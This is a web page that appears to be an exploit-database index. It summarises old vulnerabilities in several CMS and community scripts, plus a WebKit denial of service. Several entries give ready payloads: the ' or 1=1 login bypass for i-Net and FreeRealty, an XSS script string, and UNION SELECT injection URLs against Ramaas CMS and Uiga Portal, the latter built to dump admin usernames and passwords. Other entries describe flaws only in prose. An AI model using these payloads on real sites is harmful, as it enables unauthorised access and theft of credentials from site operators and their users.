header-logo
Suggest Exploit
explore-vulnerabilities

Explore Vulnerabilities

Version
Year

Explore all Exploits:

XSS and Authentication bypass in i-Net Online Community site script

i-Net Online Community site script is an online social networking software that allows you to start your own site just like Myspace, Hi5 and Facebook. Our online community script allow members to connect with people in their personal networks and people can create a new online interactive resource that is based on a trusted network of friends and associates on the internet. This online community website script can be customized and be branded for you. Authentication bypass can be done by using ' or 1=1 or ''=' in both login and password. XSS can be done by using '"--><script>alert(0x000872)</script> as the attack parameter.

Ramaas Software CMS SQL Injection Vulnerability

This is a vulnerability in the Ramaas Software CMS, which allows attackers to inject malicious SQL code into vulnerable web applications. The vulnerable links are http://example.com/display_agents.php?id=243', http://example.com/view.php?articleid=14567', http://example.com/view_businessnews.php?articleid=7', http://example.com/view_article.php?articleid=12242', and http://example.com/article.php?articleid=111'. The exploit code is 'http://example.com/display_agents.php?id=-243+union+select+all+1,2,3,version(),5,user(),7,8--', 'http://example.com/view.php?articleid=-14567+union+select+all+1,2,3,version(),5,user(),7,8,9,10--', 'http://example.com/view_businessnews.php?articleid=-7+union+select+all+1,2,3,version(),user(),6,7,8,9--', 'http://example.com/view_article.php?articleid=-12242+union+select+all+1,2,3,version(),user(),6,7,8,9--', and 'http://example.com/article.php?articleid=-111+union+select+all+1,2,3,version(),5,user(),7,8,9,10,11--'.

Authentication bypass in FreeRealty(Free Real Estate Listing Software)

Free Realty is primarily designed for real estate agents and offices to list properties on the internet. With Free Realty the end user does not need to be fluent in web page design. The following script has authentication bypass. Use ' or 1=1 or ''=' in both login and password.

PostNuke 0.764 Module modload SQL Injection Vulnerability

PostNuke 0.764 is vulnerable to a SQL injection vulnerability in the 'modules.php' file. An attacker can exploit this vulnerability by sending a specially crafted SQL query to the 'modules.php' file via the 'sid' parameter. This can allow an attacker to gain access to sensitive information such as usernames and passwords stored in the database.

CMScout 2.08 SQL Injection Vulnerability

CMScout 2.08 is vulnerable to a SQL injection vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. This can allow the attacker to gain access to sensitive information such as usernames and passwords stored in the database.

kasseler cms 2.0.5 => by Pass / Download Backup Vulnerability

Kasseler CMS 2.0.5 is vulnerable to a bypass/download backup vulnerability. An attacker can access the backup.php page and download the backup file containing the login information. Additionally, an XSS vulnerability is present in the index.php page.

Infinite Loop Vulnerability in WebKit

This vulnerability is caused by an infinite loop in WebKit, which is a browser engine used in Safari, Chrome, and other browsers. The loop is caused by a setInterval() call in a loop, which causes the browser to continuously execute the loop. This can cause the browser to become unresponsive and crash. The vulnerability has been tested on AppleWebKit/531.9 (Safari 4.0.3), AppleWebKit/531.21.8 (Safari 4.0.4), and AppleWebKit/532.5 (Chrome 4.1.249) on Microsoft Windows 7.

Joomla Component com_joomradio SQL injection vulnerability

This vulnerability allows an attacker to inject malicious SQL code into the vulnerable application. The vulnerability exists in the com_joomradio component of Joomla, which is vulnerable to a SQL injection attack. The attacker can exploit this vulnerability by crafting a malicious SQL query and sending it to the vulnerable application. The query will be executed by the application, allowing the attacker to gain access to sensitive information such as usernames and passwords.

Uiga Personal Portal index.php (view) SQL Injection

Exploited Link: http://[site]/uigaportal/index.php?view=ar_det&exhort=-36' Examples: http://[site]/product/demo/uigaportal/index.php?view=ar_det&exhort=-36+union+select+all+1,2,3,4,5,6,group_concat(admin_name,0x3a,admin_password),8,9,10,11+from+admin-- http://[site]/index.php?view=ar_det&exhort=-36+union+select+all+1,2,3,4,5,6,group_concat(admin_email,0x3a,admin_password),8,9,10,11+from+tbl_admin-- Important: Sometimes the table name is administrators and sometimes its admin

Recent Exploits: